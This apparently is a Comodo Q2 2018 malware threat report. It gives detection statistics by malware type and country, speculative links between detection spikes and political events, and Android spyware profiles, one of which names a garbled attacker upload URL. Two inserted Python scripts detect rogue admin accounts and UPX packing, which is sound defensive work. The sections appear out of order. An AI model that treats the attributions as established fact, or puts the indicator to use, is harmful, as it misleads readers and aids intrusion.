A computer worm is like a virus but typically travels autonomously, exploiting vulnerabilities in network defenses as it spreads across the Internet. A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network. However, even worms without a payload can consume enormous bandwidth, diminish network or local system resources and possibly cause a denial of service. For this Q2 2018 report we place worms in a special category called "Strategic Threat" due to their ability to travel very quickly across the Internet and compromise many computers at once.
5.1.1 Generic Worms

This section shows the world's most common computer worm detections, covering generic worm-like activity that is not tied to a specific propagation vector.

Brontok, which has been plaguing our planet for over a decade, ranked as the top computer worm, followed by Conficker, Nimda and over 300 more.

The bubble chart shows that in Q2 2018 Russia (ru), Turkey (tr) and India (in) were the countries with the highest number of worm infections.

And finally, this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May), with Russian worm detections spread more evenly throughout Q2 2018.
5.1.2 Net Worms

A "Net Worm" typically infects network shares (such as a remote hard drive or server), from which it can infect every computer that accesses them from a local area network (LAN) or company intranet.

In Q2 2018 Allaple was the most common Net Worm detected, which Microsoft describes as a "multi-threaded polymorphic" worm that can perform denial-of-service (DoS) attacks against websites.

The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2.

The timeline above shows that Poland, Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2, and that French detections were spread more evenly throughout the quarter.
5.1.3 Email Worms

Email worms spread as attachments or links in messages sent from infected machines, and many variants also travel between victim computers by other means, for example via exploits and autorun functionality.

This quarter the most common Email Worm by far was Runonce.

The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za) and Brazil (br).

This timeline shows the primary Email Worm outbreaks during Q2 2018, with Russia experiencing rather frequent Email Worm challenges, Germany having the deepest concentration at the beginning of June and Poland the sharpest spike toward the end of Q2.
5.1.4 p2p Worms

A peer-to-peer (p2p) network consists of interconnected nodes (or "peers") that share resources without a centralized administrative system. Such networks are commonly used to share files such as unauthorized copies of books and films, and hackers take advantage of this to disseminate malware.

Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a "memory resident" virus that infects .exe and .scr files and may use the Gnutella p2p network protocol to distribute copies of itself.

The bubble chart above clearly shows Russia as the primary home of p2p Worms in Q2 2018.

And this timeline shows that Russia did not suffer from just one p2p Worm outbreak, but many.
5.1.5 IM Worms

Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an "IM" or instant messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.

During Q2 2018 most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.

This particular IM Worm was a variant of a famous IM Worm called Yahos, which led to the arrest of 10 people by the FBI in 2012 for spreading banking malware via social networks with the Yahos IM Worm.

This timeline shows that while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.
5.2 High Threat Malware

In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once they are installed on a system or network, they can be devastating to personal or enterprise security.
5.2.1 Backdoors

A backdoor is a hidden way to bypass normal user authentication, often leveraged to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.

The most common Backdoor that Comodo detected for Q2 2018 was DarkComet, a remote access trojan (RAT) that is fully 10 years old. This malware allows a hacker to control a compromised system with the aid of a graphical user interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.

The United Kingdom ("gb" for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2.

The UK's Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.
5.2.2 Viruses

A computer virus is self-replicating code that "infects" other computer programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action such as opening an attachment or clicking on a hyperlink.

Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a "severe" virus that infects Windows executable files (EXE) and HTML files and spreads through infected removable drives such as USB flash drives.

The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.

This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.
5.2.3 Trojans

Trojans take their name from the famous wooden horse of Greek mythology, due to malicious functionality that is hidden within seemingly useful or benign computer programs. Typically, Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.

In Q2 2018 Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrators group as a "Remote Service Account".
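Microsoft's description of Starter (a new account created and immediately added to the administrators group) maps onto two Windows Security events: 4720 (a user account was created) and 4732 (a member was added to a security-enabled local group). The following detection is an added example, not part of the Comodo report: it correlates the two events over a short window and alerts only when the new account lands in BUILTIN\Administrators (well-known SID S-1-5-32-544). The log lines are constructed to mimic a flattened event export; the field names follow the Windows event XML (SubjectUserName, TargetUserName, MemberName, TargetSid), and the host, user and group names in the sample are invented. In real telemetry 4732 often carries only MemberSid, so production logic should key on the SID reported in the 4720's TargetSid rather than on the name.

```python
import re
from datetime import datetime, timedelta

ACCOUNT_CREATED = "4720"            # "A user account was created"
LOCAL_GROUP_MEMBER_ADDED = "4732"   # "A member was added to a security-enabled local group"
ADMINISTRATORS_SID = "S-1-5-32-544" # well-known SID of BUILTIN\Administrators

# Constructed sample export (not real telemetry): timestamp, then key=value fields
# named as in the Windows Security event XML. Deliberately not in time order.
SAMPLE_LOG = """\
2018-06-02 03:14:07 EventID=4720 SubjectUserName=WEBSRV01$ TargetUserName=svc_remote
2018-06-02 03:14:09 EventID=4732 SubjectUserName=WEBSRV01$ MemberName=svc_remote TargetUserName=Administrators TargetSid=S-1-5-32-544
2018-06-02 09:30:00 EventID=4720 SubjectUserName=jdoe TargetUserName=intern_temp
2018-06-02 09:31:12 EventID=4732 SubjectUserName=jdoe MemberName=intern_temp TargetUserName=Users TargetSid=S-1-5-32-545
2018-05-28 11:00:00 EventID=4720 SubjectUserName=helpdesk TargetUserName=backup_op
2018-06-01 16:45:31 EventID=4732 SubjectUserName=helpdesk MemberName=backup_op TargetUserName=Administrators TargetSid=S-1-5-32-544
"""

LINE_RE = re.compile(r"^(\d{4}-\d\d-\d\d \d\d:\d\d:\d\d) (.+)$")
FIELD_RE = re.compile(r"(\w+)=(\S+)")


def parse_event(line: str):
    """Turn one exported line into a dict of fields plus a datetime; None for junk lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    event = dict(FIELD_RE.findall(m.group(2)))
    event["timestamp"] = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S")
    return event


def find_rogue_admins(log_text: str, window: timedelta = timedelta(minutes=10)) -> list:
    """Alert on accounts added to Administrators within `window` of their creation."""
    events = [e for e in map(parse_event, log_text.splitlines()) if e]
    events.sort(key=lambda e: e["timestamp"])   # exports are not guaranteed to be ordered
    created = {}                                 # account name -> its 4720 event
    alerts = []
    for ev in events:
        if ev.get("EventID") == ACCOUNT_CREATED:
            created[ev["TargetUserName"].lower()] = ev
        elif ev.get("EventID") == LOCAL_GROUP_MEMBER_ADDED and ev.get("TargetSid") == ADMINISTRATORS_SID:
            origin = created.get(ev.get("MemberName", "").lower())
            if origin is None:
                continue                         # pre-existing account; a different (noisier) rule
            age = ev["timestamp"] - origin["timestamp"]
            if timedelta(0) <= age <= window:
                alerts.append({
                    "account": origin["TargetUserName"],
                    "created_by": origin.get("SubjectUserName"),
                    "added_by": ev.get("SubjectUserName"),
                    "seconds_between": age.total_seconds(),
                })
    return alerts


if __name__ == "__main__":
    for alert in find_rogue_admins(SAMPLE_LOG):
        print("rogue admin:", alert)
```

The ten-minute window is what separates Starter-style behaviour (creation and elevation seconds apart, here by a web server's machine account) from routine onboarding; the sample's backup_op account, elevated four days after creation, only fires if the window is widened.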
The bubble chart shows that Germany (de) was the #1 country for Trojans according to Comodo detections.

And this timeline shows when this huge Trojan infestation took place: at the beginning of June 2018.
5.2.4 Exploits

Computer exploits comprise software, chunks of data or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware. Exploits can enable unauthorized access, privilege escalation or denial of service (DoS).

Exploit detections are comparatively rare, as the vulnerabilities they target are typically patched quickly once discovered.

In Q2 2018 the majority of exploits detected by Comodo focused on a favorite hacker target: Adobe Portable Document Format (PDF) files, a format created in the 1990s to present documents independently of application software, hardware and operating systems.

Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.
5.3 Medium Threat Malware

In this section we focus on five malware types that are somewhat rarer and more exotic: Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.
5.3.1 Constructor

Constructors are applications that can be used to automatically create malware files.

For Q2, Alamar was the top constructor that Comodo detected. Microsoft describes this program as a "Severe" malware threat to PC users.

In Q2, Germany (de) was the top country of detection for Constructors.

And this timeline shows that Germany not only had a serious problem with Constructors in Q2, but also that the malware is likely a persistent threat to German networks.
5.3.2 Packers

Malware that is "packed" refers to any means used to hide or obfuscate malicious executable code by compressing or "packing" it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means to obfuscate the attack.

MUPX, or Modified "Ultimate Packer for Executables" (UPX), dominated this part of the malware landscape. UPX itself is free, open-source software that is compatible with numerous file formats and operating systems and leverages an open-source data compression library, UCL, whose decompressor is only a few hundred bytes of code.
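Section-table triage is how an analyst tells stock UPX from a modified build without running the sample. A stock UPX binary carries sections named UPX0/UPX1 and the "UPX!" pack-header magic in the header padding after the section table; a modified build typically keeps the same layout (an empty first section whose virtual size reserves room for the unpacked image, followed by a high-entropy section holding the compressed data) but renames the sections and strips the magic so signature-based tools miss it. The following script is an added example, not code from the Comodo report: it parses the PE section table, computes per-section entropy and applies both checks. The three PE images are constructed in memory (minimal PE32 headers, a deterministic SHA-256 chain standing in for compressed data) rather than taken from real samples, and the bytes following "UPX!" are a simplified stand-in for the real pack-header fields.

```python
import hashlib
import math
import struct
from collections import Counter

SECTION_FMT = "<8sIIIIIIHHI"   # IMAGE_SECTION_HEADER, 40 bytes
DATA_START = 0x200              # file offset where section data begins in the constructed samples


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty input, close to 8.0 for random (or compressed) data."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def parse_sections(pe: bytes) -> list:
    """Walk the COFF section table; return name, sizes, file offset and entropy per section."""
    if pe[:2] != b"MZ":
        raise ValueError("no MZ header")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    nsec = struct.unpack_from("<H", pe, e_lfanew + 6)[0]        # COFF NumberOfSections
    opt_size = struct.unpack_from("<H", pe, e_lfanew + 20)[0]   # COFF SizeOfOptionalHeader
    table = e_lfanew + 24 + opt_size                             # first IMAGE_SECTION_HEADER
    sections = []
    for i in range(nsec):
        name, vsize, _va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", pe, table + 40 * i)
        sections.append({
            "name": name.rstrip(b"\0").decode("latin-1"),
            "virtual_size": vsize,
            "raw_size": raw_size,
            "raw_ptr": raw_ptr,
            "entropy": round(shannon_entropy(pe[raw_ptr:raw_ptr + raw_size]), 2),
        })
    return sections


def classify_packer(pe: bytes) -> str:
    sections = parse_sections(pe)
    data_start = min((s["raw_ptr"] for s in sections if s["raw_size"]), default=len(pe))
    header_area = pe[:data_start]                                # headers plus padding, before any section data
    if any(s["name"].startswith("UPX") for s in sections) or b"UPX!" in header_area:
        return "UPX (stock)"
    # Layout heuristic: empty section reserving the unpacked image, then a packed high-entropy section.
    for first, second in zip(sections, sections[1:]):
        if (first["raw_size"] == 0 and first["virtual_size"] > 0
                and second["raw_size"] > 0 and second["entropy"] > 7.0):
            return "UPX-style layout, renamed sections (modified UPX / MUPX candidate)"
    return "no UPX-style packing detected"


def pseudo_random(n: int, seed: bytes = b"mupx-demo") -> bytes:
    """Deterministic high-entropy filler (SHA-256 chain) standing in for compressed data."""
    out, block = bytearray(), seed
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out += block
    return bytes(out[:n])


def build_pe(specs, upx_marker: bool) -> bytes:
    """Constructed minimal PE32: specs is a list of (name, virtual_size, raw_bytes_or_None)."""
    hdr = bytearray(b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40))             # e_lfanew = 0x40
    hdr += b"PE\0\0"
    hdr += struct.pack("<HHIIIHH", 0x14C, len(specs), 0, 0, 0, 224, 0x0102)  # COFF header, i386
    hdr += struct.pack("<H", 0x10B) + b"\0" * 222                            # PE32 optional header (zeroed)
    body, va = bytearray(), 0x1000
    for name, vsize, raw in specs:
        raw = raw or b""
        raw_ptr = DATA_START + len(body) if raw else 0
        hdr += struct.pack(SECTION_FMT, name.ljust(8, b"\0"), vsize, va, len(raw), raw_ptr, 0, 0, 0, 0, 0xE0000020)
        body += raw
        va += (vsize + 0xFFF) & ~0xFFF
    if upx_marker:
        hdr += b"UPX!" + b"\x0d\x0b\x08\x0d"   # simplified stand-in for the UPX pack header
    assert len(hdr) <= DATA_START
    hdr += b"\0" * (DATA_START - len(hdr))
    return bytes(hdr + body)


PACKED = pseudo_random(4096)
SAMPLE_STOCK_UPX = build_pe([(b"UPX0", 0x10000, None), (b"UPX1", 0x4000, PACKED), (b".rsrc", 0x1000, b"\0" * 512)], True)
SAMPLE_MODIFIED_UPX = build_pe([(b".text", 0x10000, None), (b".data", 0x4000, PACKED), (b".rsrc", 0x1000, b"\0" * 512)], False)
SAMPLE_UNPACKED = build_pe([(b".text", 0x2000, b"\x55\x8b\xec\x90\xc3\x00" * 300), (b".data", 0x1000, b"\0" * 512)], False)

if __name__ == "__main__":
    for label, sample in [("stock", SAMPLE_STOCK_UPX), ("modified", SAMPLE_MODIFIED_UPX), ("unpacked", SAMPLE_UNPACKED)]:
        print(label, classify_packer(sample), [(s["name"], s["raw_size"], s["entropy"]) for s in parse_sections(sample)])
```

The layout check is what catches the renamed build; on real files expect false positives from legitimate installers and self-extractors that use the same reserve-then-unpack pattern, so treat the verdict as a reason to unpack and inspect, not as a conviction.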
In Q2 2018 Russia was the #1 home of malware Packers.

This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.
5.3.3 Email Flooder

Email Flooders are malware used to overwhelm email servers with messages in order to "kill" them or shut them down, in a form of denial-of-service (DoS) attack.

The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.

The primary country where Comodo detected this malicious behavior was Germany.

And this timeline shows that while the number of Palevo detections was not high, it was still a persistent threat in Germany.
5.3.4 Virtual Tools

Virtual Tools are programs that can modify or alter malicious files to avoid detection.

The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.

The top two countries for Virtual Tools detections were Germany and the US.

This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.
5.3.5 Jokes

"Joke" malware is in fact just what it says: non-malicious applications that claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.

Such malware is typically labeled only a "Medium" threat because the hacker's intention is not to damage or destroy information but merely to have fun at the victim's expense.

Germany (de) and the US were the top two countries of detection for Joke malware.

In this timeline you can see that this malware type is not numerous, but still something to be aware of.
5.4 Low Threat Malware: Applications

In this section we cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.
5.4.1 Applications

Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.

In Q2 2018 the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only a "Potentially Unwanted Application" (PUA), this software is nasty and attempts to install files that run at startup, add drivers, inject processes, alter browser behavior and modify DNS settings.

The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.

And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.
5.4.2 Unwanted Applications

The unwanted application category is alarming in that, in the course of common computer and Internet activity, users often inadvertently install these applications. They include common adware programs, widely disseminated images, videos, dialers, jokes, gossip and more.

The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user's homepage, modify the search provider and/or perform other actions users might not have intended. Such software includes free toolbars, adware and "system optimizers".

As you can see in the bubble chart, the US was far and away the most common country of detection for unwanted applications in Q2 2018.

And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.
5.4.3 Unsafe Applications

Unsafe applications are seemingly legitimate programs that are in fact frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite; they include fake anti-virus and free Internet Relay Chat (IRC) clients.

The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. Such programs are referred to as "hacktools" and may be distributed with additional malware that users can install inadvertently.

This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.

This timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.
6 Vertical Analysis

In this section let's examine the unique malware profiles that Comodo identified within specific "verticals", or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the top malware family for each vertical's top malware type.

Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detections not only in one but in multiple verticals, clearly making them a current strategic threat across the world.
First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers, but now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "Clicker" to boost the hit count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.

Second, let's examine "Zbot", which is another name for the "Zeus" Trojan, undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation. And over a decade later, Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.

Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target's computer already has a virus and needs to be cleaned.

In conclusion: first, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks; second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies the primary malware threats and better focuses limited time and resources against them.
7 Geopolitical Intelligence

7.1 USA

This timeline displays a range of the most dangerous malware types detected within the United States in spring 2018. Clearly, the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements, comprising many requests for information related to upcoming changes in US political, military and intelligence activities. These agencies then immediately began to fulfill those requirements via computer hacking, commonly called cyber espionage, which today takes place on a far greater scale than the public realizes.
7.2 China

This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly, June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services, both foreign and domestic, were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.
7.3 South Korea

National security events always attract the attention of professional hackers, who seek to collect the kind of information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with the annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online: students collect data for academic papers, spies collect data for intelligence reports.
7.4 North Korea

The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the usual number of detections. One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual, or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.
7.5 Armenia

All major geopolitical events today are bathed in malware. The reason is that all activities, from social activities to business, politics or national security affairs, are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.
7.6 Belarus

A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's Virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: either to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.
7.7 Iraq

Today there is possibly no hotter topic in information security than election hacking. In this chart showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April, Iraq was preparing for a national election, which included a conundrum on how best to secure its electronic dimension. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.
7.8 Ukraine

Sometimes it is hard to know the reason for a specific spike in malware detection – and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.
7.9 Croatia

Since the cyberattack that targeted Estonia in 2007, it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".
7.10 Finland, Russia, USA

Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike – by far – occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki. Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinki's suburb of Vantaa – precisely where the summit was scheduled to take place.
8 Conclusions

In Q2, Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.

The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should assume that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.

Our findings show that malware is becoming more cunning in delivery method, more sophisticated in persistence and much harder for antivirus software to detect. Propagation of fileless malware, the evolution of cryptominers and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.

Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and to store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.

Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: the accelerating bias of cybercriminals toward hunting for confidential data.

Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future, creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy, policies and postures.
About Comodo Cybersecurity

Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day. The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence, and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners and the public community.

Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint, with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey, and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information, visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.
4 Android Devices Under Siege
4.1 Spying, Stealing, Mining

Android devices are rapidly becoming high-value targets for cybercriminals and malware authors. It is not surprising, because today almost any smartphone is a treasure trove of information for perpetrators. People increasingly use smartphones for financial operations, but those are not the only jackpot for attackers. Today every smartphone contains a plethora of confidential information about its owner.
If the victim is a CEO, politician or other VIP, the content of the mobile device can be sold at the highest prices. Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims. Of course, not only cybercriminals hunt for smartphone content. Intelligence agencies and business competitors want to know everything about their targets. Add jealous spouses tracking every move of their partners and parents wanting to control their children, and you will easily understand why Android-oriented malware is a growing business.
Today spying is the number one purpose of Android malware. In Q2, Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them. You can see the whole family of these digital spooks on the graph.
The digital spooks
Like real-world spies, digital agents impersonate legitimate entities, pretending to be innocent applications or hiding malicious code inside legitimate software. Like real spies, they seek to remain invisible, constantly change disguises to avoid detection and hone their tradecraft from version to version.
4.1.1 KevDroid

The first is named KevDroid. It's distributed in three versions:
Version-1: Naver Defender
Version-2: Netease Defender
Version-3: PU
Disguises of KevDroid
The first version, disguised as the Naver Defender application, covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection. This sample has multifunctional abilities for spying. It steals account details, contacts (id, name, phone numbers) and the email address of the owner. It grabs SMS messages and associated info. It attempts to read call logs (number, name, type, duration), emails (email, type) and photos of the contacts. After extracting all the data, the malware encrypts it with the "AES" algorithm and sends it to the attackers' server httphttpcgalimcomadminhrpupuphpdo=upload
KevDroid records the victim's every phone call, then encrypts and uploads it to the cybercriminals' server. In addition, it collects information about currently running services, installed apps and the launcher name.
The second version, Netease Defender, has additional spying abilities. It takes control over the device camera and covertly records the victim's activity. Then it sends the video to the attackers' server.
Version-3 of KevDroid takes photos, records calls and creates a list of files on the device. It also extracts the web history, account and contact details, and the device information.
People assume they are safe if they download apps exclusively from the official Google Play store. This wrong assumption can be costly: the first version of Desert Scorpion spyware was spread via official Google Play Services. The spyware was camouflaged as a chat app called Dardesh Instant App. But when a user downloaded and ran it, the app covertly connected to the cybercriminals' Command and Control server and downloaded the spyware onto the device. From that moment, the spyware constantly kept track of all events on the infected device. Another means of malware dissemination was social networks.
Version-1: Dardesh Google Play Services Instant Apps
Version-2: Settings
Disguises of Desert Scorpion
The second version of Desert Scorpion records calls, audio and video, uninstalls other apps, sends and receives messages and tracks the location of the smartphone. It is included in some spyware tools like FinSpy and Pegasus. Beyond the capabilities of the first version, it collects information about installed applications, extracts the metadata and makes changes on the victim device.
4.1.2 Zoo Park

The next member of the spy family, Zoo Park, has 4 different versions:
Version-1: Telegram Groups انتخاب دھم
Version-2: Postrall Yes For Referendum انتخاب دھم
Version-3: Celebs Gone Wild جریدة النھار الكویتیة 剑侠挂机
Version-4: VPN Easy DroFirewall m_android
Disguises of Zoo Park
The first version tries to impersonate the Telegram app. It extracts Accounts and Contacts details, encodes them with Base64 and sends them to the attackers' server. The second version has additional abilities: extracting SMS details, device information (including IMEI, Network Operator Name, SDK version, OS version, etc.), Call Log details and External Storage content.
The third version is included in spyware named "Spymaster Pro" and can:
Enable and disable the GPS services
Record audio and send it to the Command & Control server
Upload image files
Collect information about the applications installed
Collect browser's data
Send SMS and read outgoing SMS
The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy, DroFirewall, etc.
In addition to the abilities of previous versions, it includes some additional tricks:
Extracts photos, audio and video
Records the screen
Executes shell commands
Records calls
4.1.3 MikeSpy

Some spyware examples specifically hunt for messengers' data, like the next digital spook, MikeSpy.
Virtual Girlfriend
Disguises of MikeSpy
MikeSpy camouflaged itself as a Virtual Girlfriend application. But instead of a girlfriend, it carries a bundle of malicious abilities:
Takes control over the Bluetooth adapter
Extracts data about accounts, contacts details and installed apps
Extracts data from the WhatsApp message DB and related keys
Uploads collected data to the cybercriminals' server via FTP
4.1.4 Xloader

The next spyware, Xloader, combines spying with purposeful hunting for banking applications on the device. It has trust-inspiring cover icons imitating Facebook and Google Chrome.
Version-1 to Version-3: FaceBook, Chrome
Disguises of Xloader
